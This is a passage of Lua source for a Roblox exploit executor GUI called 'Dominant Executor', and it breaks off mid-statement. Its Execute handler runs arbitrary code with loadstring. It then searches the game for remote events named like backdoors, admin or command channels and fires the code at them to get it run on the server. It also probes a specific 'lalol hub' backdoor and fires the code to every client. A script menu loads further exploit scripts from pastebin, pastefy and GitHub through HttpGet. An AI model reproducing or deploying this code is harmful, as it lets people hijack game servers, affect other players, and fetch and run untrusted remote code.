local project = Instance.new("ScreenGui") local Frame = Instance.new("Frame") local execute = Instance.new("TextButton") local clear = Instance.new("TextButton") local ex = Instance.new("TextButton") local outputContainer = Instance.new("ScrollingFrame") local output = Instance.new("TextLabel") local TextLabel = Instance.new("TextLabel") local image = Instance.new("ImageLabel") local TextBox = Instance.new("TextBox") local project_2 = Instance.new("TextButton") local view = Instance.new("TextButton") local scriptlist = Instance.new("ScrollingFrame") local blue = Instance.new("TextButton") local infyield = Instance.new("TextButton") local skid = Instance.new("TextButton") local c00lgui = Instance.new("TextButton") local Dex = Instance.new("TextButton") local exser = Instance.new("TextButton") local Topk3k = Instance.new("TextButton") local Duck = Instance.new("TextButton") local Disco = Instance.new("TextButton") local Polaria = Instance.new("TextButton") local BiPolaria = Instance.new("TextButton") local Scythe = Instance.new("TextButton") local Freddy = Instance.new("TextButton") local Soul = Instance.new("TextButton") local Goner = Instance.new("TextButton") local Mr = Instance.new("TextButton") local pex = Instance.new("TextButton") local HeadName = Instance.new("TextButton") local kick = Instance.new("TextButton") local virus = Instance.new("TextButton") local Decal = Instance.new("TextButton") local Admin = Instance.new("TextButton") local Car = Instance.new("TextButton") local ssp = Instance.new("TextButton") local disco = Instance.new("TextButton") local Dec = Instance.new("TextButton") local jum = Instance.new("TextButton") local Cool = Instance.new("TextButton") local Deca = Instance.new("TextButton") local DIS = Instance.new("TextButton") local ju = Instance.new("TextButton") local shel = Instance.new("TextButton") local hint = Instance.new("TextButton") local hint2 = Instance.new("TextButton") project.Name = "project" project.Parent = game.CoreGui Frame.Parent = project Frame.Active = true Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Frame.Position = UDim2.new(0.236403197, 0, 0.1433869, 0) Frame.Size = UDim2.new(0, 627, 0, 381) Frame.Draggable = true local ExitBtn = Instance.new("TextButton") ExitBtn.Name = "ExitBtn" ExitBtn.Parent = Frame ExitBtn.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ExitBtn.BackgroundTransparency = 1 ExitBtn.BorderSizePixel = 0 ExitBtn.Position = UDim2.new(0.935, 0, 0, 0) ExitBtn.Size = UDim2.new(0, 40, 0, 24) ExitBtn.Font = Enum.Font.SourceSans ExitBtn.Text = "X" ExitBtn.TextColor3 = Color3.fromRGB(0, 0, 0) ExitBtn.TextSize = 16.000 ExitBtn.MouseButton1Click:Connect(function() project:Destroy() end) local MaxBtn = Instance.new("TextButton") MaxBtn.Name = "MaxBtn" MaxBtn.Parent = Frame MaxBtn.BackgroundColor3 = Color3.fromRGB(255, 255, 255) MaxBtn.BackgroundTransparency = 1 MaxBtn.BorderSizePixel = 0 MaxBtn.Position = UDim2.new(0.875, 0, 0, 0) MaxBtn.Size = UDim2.new(0, 40, 0, 24) MaxBtn.Font = Enum.Font.SourceSans MaxBtn.Text = "□" MaxBtn.TextColor3 = Color3.fromRGB(0, 0, 0) MaxBtn.TextSize = 16.000 local MinBtn = Instance.new("TextButton") MinBtn.Name = "MinBtn" MinBtn.Parent = Frame MinBtn.BackgroundColor3 = Color3.fromRGB(255, 255, 255) MinBtn.BackgroundTransparency = 1 MinBtn.BorderSizePixel = 0 MinBtn.Position = UDim2.new(0.815, 0, 0, 0) MinBtn.Size = UDim2.new(0, 40, 0, 24) MinBtn.Font = Enum.Font.SourceSans MinBtn.Text = "—" MinBtn.TextColor3 = Color3.fromRGB(0, 0, 0) MinBtn.TextSize = 18.000 local Page1 = Instance.new("Folder") Page1.Name = "Page1" Page1.Parent = Frame local Page2 = Instance.new("Folder") Page2.Name = "Page2" Page2.Parent = Frame local isMinimized = false MinBtn.MouseButton1Click:Connect(function() isMinimized = not isMinimized if isMinimized then Frame.Size = UDim2.new(0, 627, 0, 24) Page1.Parent = nil Page2.Parent = nil project_2.Visible = false view.Visible = false scriptlist.Visible = false else Frame.Size = UDim2.new(0, 627, 0, 381) Page1.Parent = Frame project_2.Visible = true view.Visible = true scriptlist.Visible = true end end) execute.Name = "execute" execute.Parent = Page1 execute.BackgroundColor3 = Color3.fromRGB(255, 255, 255) execute.Position = UDim2.new(0.0159489624, 0, 0.65, 0) execute.Size = UDim2.new(0, 137, 0, 28) execute.Font = Enum.Font.SourceSans execute.Text = "Execute" execute.TextColor3 = Color3.fromRGB(0, 0, 0) execute.TextSize = 14.000 execute.MouseButton1Click:Connect(function() local code = TextBox.Text if code and code ~= "" then local success, err = pcall(function() local executed = false local serverExecuted = false local feExecuted = false loadstring(code)() executed = true for _, v in pairs(game:GetDescendants()) do if v:IsA("RemoteEvent") or v:IsA("RemoteFunction") then local n = v.Name:lower() if n:find("main") or n:find("remote") or n:find("admin") or n:find("exec") or n:find("run") or n:find("backdoor") or n:find("server") or n:find("cmd") or n:find("command") then pcall(function() if v:IsA("RemoteEvent") then v:FireServer("loadstring([[" .. code .. "]])()") v:FireServer(code) v:FireServer(unpack({code})) elseif v:IsA("RemoteFunction") then task.spawn(function() v:InvokeServer("loadstring([[" .. code .. "]])()") v:InvokeServer(code) end) end serverExecuted = true end) end end end local protected_backdoor = game:GetService('ReplicatedStorage'):FindFirstChild('lh'..game.PlaceId/6666*1337*game.PlaceId) if protected_backdoor and protected_backdoor:IsA('RemoteFunction') then pcall(function() protected_backdoor:InvokeServer('lalol hub join today!! discord.gg/XXqzxT7E5z', code) protected_backdoor:InvokeServer('lalol hub join today!! discord.gg/XXqzxT7E5z', "loadstring([[" .. code .. "]])()") serverExecuted = true end) end local backdoorModule = game:GetService('ReplicatedStorage'):FindFirstChild('BackdoorModule') if backdoorModule then pcall(function() require(backdoorModule).ExecuteCode(code) require(backdoorModule).ExecuteCode("loadstring([[" .. code .. "]])()") serverExecuted = true end) end for _, v in pairs(game:GetService("ReplicatedStorage"):GetDescendants()) do if v:IsA("RemoteEvent") or v:IsA("RemoteFunction") then pcall(function() if v:IsA("RemoteEvent") then v:FireAllClients("loadstring([[" .. code .. "]])()") v:FireAllClients(code) end serverExecuted = true end) end end for _, v in pairs(game:GetService("Workspace"):GetDescendants()) do if v:IsA("RemoteEvent") or v:IsA("RemoteFunction") then pcall(function() if v:IsA("RemoteEvent") then v:FireServer(code) end serverExecuted = true end) end end if string.find(code, "require") then local assetId = code:match("require%s*%(?%s*(%d+)%s*%)?") if assetId then pcall(function() local objects = game:GetObjects("rbxassetid://" .. assetId) for _, obj in pairs(objects) do if obj:IsA("ModuleScript") then require(obj) serverExecuted = true end end end) end end if string.find(code, "game:GetObjects") or string.find(code, "GetObjects") then pcall(function() loadstring(code)() feExecuted = true end) end if string.find(code, "LocalScript") or string.find(code, "script.Parent") then pcall(function() local scr = Instance.new("LocalScript") scr.Source = code scr.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") feExecuted = true end) end if executed and serverExecuted then output.Text = "✅ Script executed! (Client + Server + FE)" elseif executed and feExecuted then output.Text = "✅ Script executed! (Client + FE)" elseif executed then output.Text = "✅ Script executed! (Client only)" else output.Text = "❌ Failed to execute script" end end) if not success then output.Text = "❌ Error: " .. err end else output.Text = "⚠️ Please enter a script to execute." end end) clear.Name = "clear" clear.Parent = Page1 clear.BackgroundColor3 = Color3.fromRGB(255, 255, 255) clear.Position = UDim2.new(0.0159489624, 0, 0.755, 0) clear.Size = UDim2.new(0, 137, 0, 28) clear.Font = Enum.Font.SourceSans clear.Text = "Clear" clear.TextColor3 = Color3.fromRGB(0, 0, 0) clear.TextSize = 14.000 clear.MouseButton1Click:Connect(function() TextBox.Text = "" output.Text = "Output and TextBox cleared." end) ex.Name = "ex" ex.Parent = Page1 ex.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ex.Position = UDim2.new(0.0159489624, 0, 0.865, 0) ex.Size = UDim2.new(0, 137, 0, 28) ex.Font = Enum.Font.SourceSans ex.Text = "Inject" ex.TextColor3 = Color3.fromRGB(0, 0, 0) ex.TextSize = 14.000 ex.MouseButton1Click:Connect(function() local Players = game:GetService("Players") local LocalPlayer = Players.LocalPlayer local PlayerGui = LocalPlayer:WaitForChild("PlayerGui") local StigmanFroud = Instance.new("ScreenGui") StigmanFroud.Name = "Stigman Froud" StigmanFroud.Parent = PlayerGui StigmanFroud.ZIndexBehavior = Enum.ZIndexBehavior.Sibling StigmanFroud.DisplayOrder = 999 StigmanFroud.ResetOnSpawn = false local trajectory = Instance.new("ImageLabel") trajectory.Name = "trajectory" trajectory.Parent = StigmanFroud trajectory.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trajectory.BackgroundTransparency = 1.000 trajectory.BorderColor3 = Color3.fromRGB(0, 0, 0) trajectory.BorderSizePixel = 0 trajectory.Position = UDim2.new(0.450740397, 0, 0.401119471, 0) trajectory.Size = UDim2.new(0, 85, 0, 85) trajectory.Image = "rbxassetid://86102463824382" local ImageLabel_2 = Instance.new("ImageLabel") ImageLabel_2.Name = "BorderEffect" ImageLabel_2.Parent = StigmanFroud ImageLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel_2.BackgroundTransparency = 1.000 ImageLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 0) ImageLabel_2.BorderSizePixel = 0 ImageLabel_2.Position = UDim2.new(0.450740397, 0, 0.401119471, 0) + UDim2.new(0, -13, 0, -13) ImageLabel_2.Size = UDim2.new(0, 111, 0, 111) ImageLabel_2.Image = "rbxassetid://90444920023407" local function AARC_fake_script() trajectory:TweenPosition(UDim2.new(0.451, 0, 0.395, 0), "Out", "Linear", 0.4, false) ImageLabel_2:TweenPosition(UDim2.new(0.451, 0, 0.395, 0) + UDim2.new(0, -13, 0, -13), "Out", "Linear", 0.4, false) task.wait(3) trajectory:TweenPosition(UDim2.new(0.005, 0, 0.619, 0), "Out", "Sine", 0.7, false) ImageLabel_2:TweenPosition(UDim2.new(0.005, 0, 0.619, 0) + UDim2.new(0, -13, 0, -13), "Out", "Sine", 0.7, false) end coroutine.wrap(AARC_fake_script)() local function RotateEffect_script() while true do task.wait(0.01) ImageLabel_2.Rotation = ImageLabel_2.Rotation + 0.3 end end coroutine.wrap(RotateEffect_script)() local function WGFAMY_fake_script() pcall(function() local GetName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId) print("Loaded At", GetName.Name) end) task.wait(0.1) print("Welcome,", LocalPlayer.Name) end coroutine.wrap(WGFAMY_fake_script)() end) outputContainer.Parent = Page1 outputContainer.BackgroundColor3 = Color3.fromRGB(240, 240, 240) outputContainer.Position = UDim2.new(0.265, 0, 0.65, 0) outputContainer.Size = UDim2.new(0, 325, 0, 115) outputContainer.ScrollBarThickness = 13 outputContainer.CanvasSize = UDim2.new(0, 0, 0, 200) outputContainer.VerticalScrollBarInset = Enum.ScrollBarInset.Always output.Parent = outputContainer output.BackgroundColor3 = Color3.fromRGB(255, 255, 255) output.Size = UDim2.new(1, 0, 1, 0) output.Font = Enum.Font.SourceSans output.Text = "Best Serverside" output.TextColor3 = Color3.fromRGB(0, 0, 0) output.TextSize = 14.000 output.TextWrapped = true output.TextXAlignment = Enum.TextXAlignment.Left output.TextYAlignment = Enum.TextYAlignment.Top TextLabel.Parent = Frame TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BorderSizePixel = 0 TextLabel.Position = UDim2.new(0.047846891, 0, 0, 0) TextLabel.Size = UDim2.new(0, 450, 0, 24) TextLabel.Font = Enum.Font.SourceSans TextLabel.Text = "Dominant Executor" TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0) TextLabel.TextSize = 14.000 TextLabel.TextXAlignment = Enum.TextXAlignment.Left image.Name = "image" image.Parent = Frame image.BackgroundColor3 = Color3.fromRGB(255, 255, 255) image.BorderSizePixel = 0 image.Size = UDim2.new(0, 24, 0, 24) image.Image = "rbxassetid://86102463824382" local TextBoxScrollingFrame = Instance.new("ScrollingFrame") TextBoxScrollingFrame.Parent = Page1 TextBoxScrollingFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextBoxScrollingFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) TextBoxScrollingFrame.BorderSizePixel = 1 TextBoxScrollingFrame.Position = UDim2.new(0.0159489624, 0, 0.144356951, 0) TextBoxScrollingFrame.Size = UDim2.new(0, 464, 0, 185) TextBoxScrollingFrame.ScrollBarThickness = 12 TextBoxScrollingFrame.AutomaticCanvasSize = Enum.AutomaticSize.Y TextBoxScrollingFrame.CanvasSize = UDim2.new(0, 0, 0, 0) TextBoxScrollingFrame.VerticalScrollBarInset = Enum.ScrollBarInset.Always TextBox.Parent = TextBoxScrollingFrame TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextBox.BackgroundTransparency = 0 TextBox.Size = UDim2.new(1, -10, 0, 185) TextBox.AutomaticSize = Enum.AutomaticSize.Y TextBox.ClearTextOnFocus = false TextBox.Font = Enum.Font.SourceSans TextBox.MultiLine = true TextBox.Text = "Original Dominant Executor Lua" TextBox.TextColor3 = Color3.fromRGB(0, 0, 0) TextBox.TextSize = 14.000 TextBox.TextXAlignment = Enum.TextXAlignment.Left TextBox.TextYAlignment = Enum.TextYAlignment.Top TextBox.TextWrapped = true project_2.Name = "project" project_2.Parent = Frame project_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) project_2.BorderSizePixel = 0 project_2.Position = UDim2.new(0, 0, 0.076115489, 0) project_2.Size = UDim2.new(0, 88, 0, 18) project_2.Font = Enum.Font.SourceSans project_2.Text = "Executor" project_2.TextColor3 = Color3.fromRGB(0, 0, 0) project_2.TextSize = 14.000 view.Name = "view" view.Parent = Frame view.BackgroundColor3 = Color3.fromRGB(255, 255, 255) view.BorderSizePixel = 0 view.Position = UDim2.new(0.140350878, 0, 0.076115489, 0) view.Size = UDim2.new(0, 88, 0, 18) view.Font = Enum.Font.SourceSans view.Text = "Settings" view.TextColor3 = Color3.fromRGB(0, 0, 0) view.TextSize = 14.000 view.TextXAlignment = Enum.TextXAlignment.Left scriptlist.Name = "scriptlist" scriptlist.Parent = Page1 scriptlist.Active = true scriptlist.BackgroundColor3 = Color3.fromRGB(255, 255, 255) scriptlist.Position = UDim2.new(0.768740058, 0, 0.144356951, 0) scriptlist.Size = UDim2.new(0, 145, 0, 310) scriptlist.HorizontalScrollBarInset = Enum.ScrollBarInset.Always scriptlist.ScrollBarThickness = 13 scriptlist.AutomaticCanvasSize = Enum.AutomaticSize.Y scriptlist.CanvasSize = UDim2.new(0, 0, 0, 0) local SettingsTextBox = Instance.new("TextBox") SettingsTextBox.Name = "SettingsTextBox" SettingsTextBox.Parent = Page2 SettingsTextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SettingsTextBox.Position = UDim2.new(0.05, 0, 0.2, 0) SettingsTextBox.Size = UDim2.new(0, 300, 0, 40) SettingsTextBox.Font = Enum.Font.SourceSans SettingsTextBox.PlaceholderText = "Masukkan teks di sini (misal: lol)" SettingsTextBox.Text = "lol" SettingsTextBox.TextColor3 = Color3.fromRGB(0, 0, 0) SettingsTextBox.TextSize = 16.000 local DurationTextBox = Instance.new("TextBox") DurationTextBox.Name = "DurationTextBox" DurationTextBox.Parent = Page2 DurationTextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255) DurationTextBox.Position = UDim2.new(0.05, 0, 0.5, 0) DurationTextBox.Size = UDim2.new(0, 140, 0, 35) DurationTextBox.Font = Enum.Font.SourceSans DurationTextBox.PlaceholderText = "Durasi (detik)" DurationTextBox.Text = "5" DurationTextBox.TextColor3 = Color3.fromRGB(0, 0, 0) DurationTextBox.TextSize = 14.000 local SetDurationBtn = Instance.new("TextButton") SetDurationBtn.Name = "SetDurationBtn" SetDurationBtn.Parent = Page2 SetDurationBtn.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SetDurationBtn.Position = UDim2.new(0.38, 0, 0.5, 0) SetDurationBtn.Size = UDim2.new(0, 140, 0, 35) SetDurationBtn.Font = Enum.Font.SourceSans SetDurationBtn.Text = "Set duration" SetDurationBtn.TextColor3 = Color3.fromRGB(0, 0, 0) SetDurationBtn.TextSize = 14.000 local SetMessageBtn = Instance.new("TextButton") SetMessageBtn.Name = "SetMessageBtn" SetMessageBtn.Parent = Page2 SetMessageBtn.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SetMessageBtn.Position = UDim2.new(0.05, 0, 0.35, 0) SetMessageBtn.Size = UDim2.new(0, 140, 0, 35) SetMessageBtn.Font = Enum.Font.SourceSans SetMessageBtn.Text = "Set message" SetMessageBtn.TextColor3 = Color3.fromRGB(0, 0, 0) SetMessageBtn.TextSize = 14.000 local SetHintBtn = Instance.new("TextButton") SetHintBtn.Name = "SetHintBtn" SetHintBtn.Parent = Page2 SetHintBtn.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SetHintBtn.Position = UDim2.new(0.38, 0, 0.35, 0) SetHintBtn.Size = UDim2.new(0, 140, 0, 35) SetHintBtn.Font = Enum.Font.SourceSans SetHintBtn.Text = "Set hint" SetHintBtn.TextColor3 = Color3.fromRGB(0, 0, 0) SetHintBtn.TextSize = 14.000 local currentDuration = 5 SetDurationBtn.MouseButton1Click:Connect(function() local num = tonumber(DurationTextBox.Text) if num then currentDuration = num DurationTextBox.Text = tostring(currentDuration) else DurationTextBox.Text = tostring(currentDuration) end end) SetMessageBtn.MouseButton1Click:Connect(function() local text = SettingsTextBox.Text local duration = currentDuration local message = Instance.new("Message", game.Workspace) message.Text = text task.wait(duration) message:Destroy() end) SetHintBtn.MouseButton1Click:Connect(function() local text = SettingsTextBox.Text local hint = Instance.new("Hint", game.Workspace) hint.Text = text hint.Name = text hint.Changed:Connect(function() hint.Text = text hint.Name = text end) hint.ChildAdded:Connect(function() for _, a in pairs(hint:GetDescendants()) do a:Destroy() end end) end) view.MouseButton1Click:Connect(function() Page1.Parent = nil scriptlist.Visible = false Page2.Parent = Frame end) project_2.MouseButton1Click:Connect(function() Page2.Parent = nil Page1.Parent = Frame scriptlist.Visible = true end) Page2.Parent = nil local function setScript(text) TextBox.Text = text end infyield.Name = "infyield" infyield.Parent = scriptlist infyield.BackgroundColor3 = Color3.fromRGB(255, 255, 255) infyield.Position = UDim2.new(0, 0, 0.0, 0) infyield.Size = UDim2.new(0, 132, 0, 23) infyield.Font = Enum.Font.Code infyield.Text = "Infinite Yield.txt" infyield.TextColor3 = Color3.fromRGB(0, 0, 0) infyield.TextSize = 14.000 infyield.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Infinite-yield-Game-commands-etc-14971"))()') end) skid.Name = "skid" skid.Parent = scriptlist skid.BackgroundColor3 = Color3.fromRGB(255, 255, 255) skid.Position = UDim2.new(0, 0, 0.0, 23) skid.Size = UDim2.new(0, 132, 0, 23) skid.Font = Enum.Font.Code skid.Text = "1x1x1x1 gui.txt" skid.TextColor3 = Color3.fromRGB(0, 0, 0) skid.TextSize = 14.000 skid.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://rawscripts.net/raw/Natural-Disaster-Survival-1X1X1X1-GUI-PLS-LIKE-11504"))()') end) c00lgui.Name = "c00lgui" c00lgui.Parent = scriptlist c00lgui.BackgroundColor3 = Color3.fromRGB(255, 255, 255) c00lgui.Position = UDim2.new(0, 0, 0.0, 46) c00lgui.Size = UDim2.new(0, 132, 0, 23) c00lgui.Font = Enum.Font.Code c00lgui.Text = "c00lgui.txt" c00lgui.TextColor3 = Color3.fromRGB(0, 0, 0) c00lgui.TextSize = 14.000 c00lgui.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://rawscripts.net/raw/RetroStudio-ssssssssssssssss-11010"))()') end) Dex.Name = "Dex" Dex.Parent = scriptlist Dex.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Dex.Position = UDim2.new(0, 0, 0.0, 69) Dex.Size = UDim2.new(0, 132, 0, 23) Dex.Font = Enum.Font.Code Dex.Text = "SSP.txt" Dex.TextColor3 = Color3.fromRGB(0, 0, 0) Dex.TextSize = 14.000 Dex.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://pastefy.app/XHqVeb0d/raw"))()') end) blue.Name = "blue" blue.Parent = scriptlist blue.BackgroundColor3 = Color3.fromRGB(255, 255, 255) blue.Position = UDim2.new(0, 0, 0.0, 92) blue.Size = UDim2.new(0, 132, 0, 23) blue.Font = Enum.Font.Code blue.Text = "1x1x1x1 Blue GUI" blue.TextColor3 = Color3.fromRGB(0, 0, 0) blue.TextSize = 14.000 blue.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-1x1x1x1-blue-gui-21876"))()') end) exser.Name = "exser" exser.Parent = scriptlist exser.BackgroundColor3 = Color3.fromRGB(255, 255, 255) exser.Position = UDim2.new(0, 0, 0.0, 115) exser.Size = UDim2.new(0, 132, 0, 23) exser.Font = Enum.Font.Code exser.Text = "GONER.TXT" exser.TextColor3 = Color3.fromRGB(0, 0, 0) exser.TextSize = 14.000 exser.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://raw.githubusercontent.com/gObl00x/My-Converts/refs/heads/main/Goner.lua"))()') end) Topk3k.Name = "Topk3k" Topk3k.Parent = scriptlist Topk3k.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Topk3k.Position = UDim2.new(0, 0, 0.0, 138) Topk3k.Size = UDim2.new(0, 132, 0, 23) Topk3k.Font = Enum.Font.Code Topk3k.Text = "HD-ADMIN.TXT" Topk3k.TextColor3 = Color3.fromRGB(0, 0, 0) Topk3k.TextSize = 14.000 Topk3k.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://raw.githubusercontent.com/PHGS971/HDadmin/refs/heads/main/HDadmin.lua"))()') end) Duck.Name = "Duck" Duck.Parent = scriptlist Duck.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Duck.Position = UDim2.new(0, 0, 0.0, 161) Duck.Size = UDim2.new(0, 132, 0, 23) Duck.Font = Enum.Font.Code Duck.Text = "caducus.txt" Duck.TextColor3 = Color3.fromRGB(0, 0, 0) Duck.TextSize = 14.000 Duck.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://pastefy.app/kE0nbQAJ/RAWAT"))()') end) Disco.Name = "Disco" Disco.Parent = scriptlist Disco.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Disco.Position = UDim2.new(0, 0, 0.0, 184) Disco.Size = UDim2.new(0, 132, 0, 23) Disco.Font = Enum.Font.Code Disco.Text = "DOGGYARMY.TXT" Disco.TextColor3 = Color3.fromRGB(0, 0, 0) Disco.TextSize = 14.000 Disco.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://pastefy.app/ChM2b8Oh/raw"))()') end) Polaria.Name = "Polaria" Polaria.Parent = scriptlist Polaria.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Polaria.Position = UDim2.new(0, 0, 0.0, 207) Polaria.Size = UDim2.new(0, 132, 0, 23) Polaria.Font = Enum.Font.Code Polaria.Text = "POLARIA.TXT" Polaria.TextColor3 = Color3.fromRGB(0, 0, 0) Polaria.TextSize = 14.000 Polaria.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://pastefy.app/xos3Of2N/raw"))()') end) BiPolaria.Name = "BiPolaria" BiPolaria.Parent = scriptlist BiPolaria.BackgroundColor3 = Color3.fromRGB(255, 255, 255) BiPolaria.Position = UDim2.new(0, 0, 0.0, 230) BiPolaria.Size = UDim2.new(0, 132, 0, 23) BiPolaria.Font = Enum.Font.Code BiPolaria.Text = "BIPOLARIA.TXT" BiPolaria.TextColor3 = Color3.fromRGB(0, 0, 0) BiPolaria.TextSize = 14.000 BiPolaria.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://pastebin.com/raw/8qFWEtWY"))()') end) Scythe.Name = "Scythe" Scythe.Parent = scriptlist Scythe.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Scythe.Position = UDim2.new(0, 0, 0.0, 253) Scythe.Size = UDim2.new(0, 132, 0, 23) Scythe.Font = Enum.Font.Code Scythe.Text = "ADMIN.TXT" Scythe.TextColor3 = Color3.fromRGB(0, 0, 0) Scythe.TextSize = 14.000 Scythe.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://pastefy.app/ciJVZnxH/raw"))()') end) Freddy.Name = "Freddy" Freddy.Parent = scriptlist Freddy.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Freddy.Position = UDim2.new(0, 0, 0.0, 276) Freddy.Size = UDim2.new(0, 132, 0, 23) Freddy.Font = Enum.Font.Code Freddy.Text = "EXSER.TXT" Freddy.TextColor3 = Color3.fromRGB(0, 0, 0) Freddy.TextSize = 14.000 Freddy.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://pastefy.app/7sO8ckTL/raw",true))()') end) Soul.Name = "Soul" Soul.Parent = scriptlist Soul.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Soul.Position = UDim2.new(0, 0, 0.0, 299) Soul.Size = UDim2.new(0, 132, 0, 23) Soul.Font = Enum.Font.Code Soul.Text = "KEYBOARD.TXT" Soul.TextColor3 = Color3.fromRGB(0, 0, 0) Soul.TextSize = 14.000 Soul.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://raw.githubusercontent.com/Xxtan31/Ata/main/deltakeyboardcrack.txt", true))()') end) Goner.Name = "Goner" Goner.Parent = scriptlist Goner.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Goner.Position = UDim2.new(0, 0, 0.0, 322) Goner.Size = UDim2.new(0, 132, 0, 23) Goner.Font = Enum.Font.Code Goner.Text = "MJOLNIR.TXT" Goner.TextColor3 = Color3.fromRGB(0, 0, 0) Goner.TextSize = 14.000 Goner.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://pastefy.app/JWZk5sQi/raw"))()') end) Mr.Name = "Mr" Mr.Parent = scriptlist Mr.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Mr.Position = UDim2.new(0, 0, 0.0, 345) Mr.Size = UDim2.new(0, 132, 0, 23) Mr.Font = Enum.Font.Code Mr.Text = "BLUUDUUD.TXT" Mr.TextColor3 = Color3.fromRGB(0, 0, 0) Mr.TextSize = 14.000 Mr.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://pastebin.com/raw/CcHxT0Gj"))()') end) pex.Name = "pex" pex.Parent = scriptlist pex.BackgroundColor3 = Color3.fromRGB(255, 255, 255) pex.Position = UDim2.new(0, 0, 0.0, 368) pex.Size = UDim2.new(0, 132, 0, 23) pex.Font = Enum.Font.Code pex.Text = "NEKO.TXT" pex.TextColor3 = Color3.fromRGB(0, 0, 0) pex.TextSize = 14.000 pex.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://raw.githubusercontent.com/ian49972/SCRIPTS/refs/heads/main/neko"))()') end) HeadName.Name = "HeadName" HeadName.Parent = scriptlist HeadName.BackgroundColor3 = Color3.fromRGB(255, 255, 255) HeadName.Position = UDim2.new(0, 0, 0.0, 391) HeadName.Size = UDim2.new(0, 132, 0, 23) HeadName.Font = Enum.Font.Code HeadName.Text = "FENRIER-PAINSIS.TXT" HeadName.TextColor3 = Color3.fromRGB(0, 0, 0) HeadName.TextSize = 14.000 HeadName.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://pastefy.app/az0yaa2e/raw"))()') end) Decal.Name = "Decal" Decal.Parent = scriptlist Decal.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Decal.Position = UDim2.new(0, 0, 0.0, 414) Decal.Size = UDim2.new(0, 132, 0, 23) Decal.Font = Enum.Font.Code Decal.Text = "DEVOYANCE.txt" Decal.TextColor3 = Color3.fromRGB(0, 0, 0) Decal.TextSize = 14.000 Decal.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://raw.githubusercontent.com/ian49972/SCRIPTS/refs/heads/main/Devoyance"))()') end) kick.Name = "kick" kick.Parent = scriptlist kick.BackgroundColor3 = Color3.fromRGB(255, 255, 255) kick.Position = UDim2.new(0, 0, 0.0, 437) kick.Size = UDim2.new(0, 132, 0, 23) kick.Font = Enum.Font.Code kick.Text = "RO-EXPLOIT V4.TXT" kick.TextColor3 = Color3.fromRGB(0, 0, 0) kick.TextSize = 14.000 kick.MouseButton1Click:Connect(function() setScript('loadstring(game:GetObjects("rbxassetid://175137115")[1].Source)()') end) virus.Name = "virus" virus.Parent = scriptlist virus.BackgroundColor3 = Color3.fromRGB(255, 255, 255) virus.Position = UDim2.new(0, 0, 0.0, 460) virus.Size = UDim2.new(0, 132, 0, 23) virus.Font = Enum.Font.Code virus.Text = "RO-EXPLOIT-V5.TXT" virus.TextColor3 = Color3.fromRGB(0, 0, 0) virus.TextSize = 14.000 virus.MouseButton1Click:Connect(function() setScript('loadstring(game:GetObjects("rbxassetid://288646117")[1].Source)()') end) Admin.Name = "Admin" Admin.Parent = scriptlist Admin.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Admin.Position = UDim2.new(0, 0, 0.0, 483) Admin.Size = UDim2.new(0, 132, 0, 23) Admin.Font = Enum.Font.Code Admin.Text = "RO-EXPLOIT V6.TXT" Admin.TextColor3 = Color3.fromRGB(0, 0, 0) Admin.TextSize = 14.000 Admin.MouseButton1Click:Connect(function() setScript('print("RO-EXPLOIT V6 Loaded")') end) Car.Name = "Car" Car.Parent = scriptlist Car.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Car.Position = UDim2.new(0, 0, 0.0, 506) Car.Size = UDim2.new(0, 132, 0, 23) Car.Font = Enum.Font.Code Car.Text = "RO-EXPLOIT V7.TXT" Car.TextColor3 = Color3.fromRGB(0, 0, 0) Car.TextSize = 14.000 Car.MouseButton1Click:Connect(function() setScript('loadstring(game:GetObjects("rbxassetid://337743103")[1].Source)()') end) ssp.Name = "ssp" ssp.Parent = 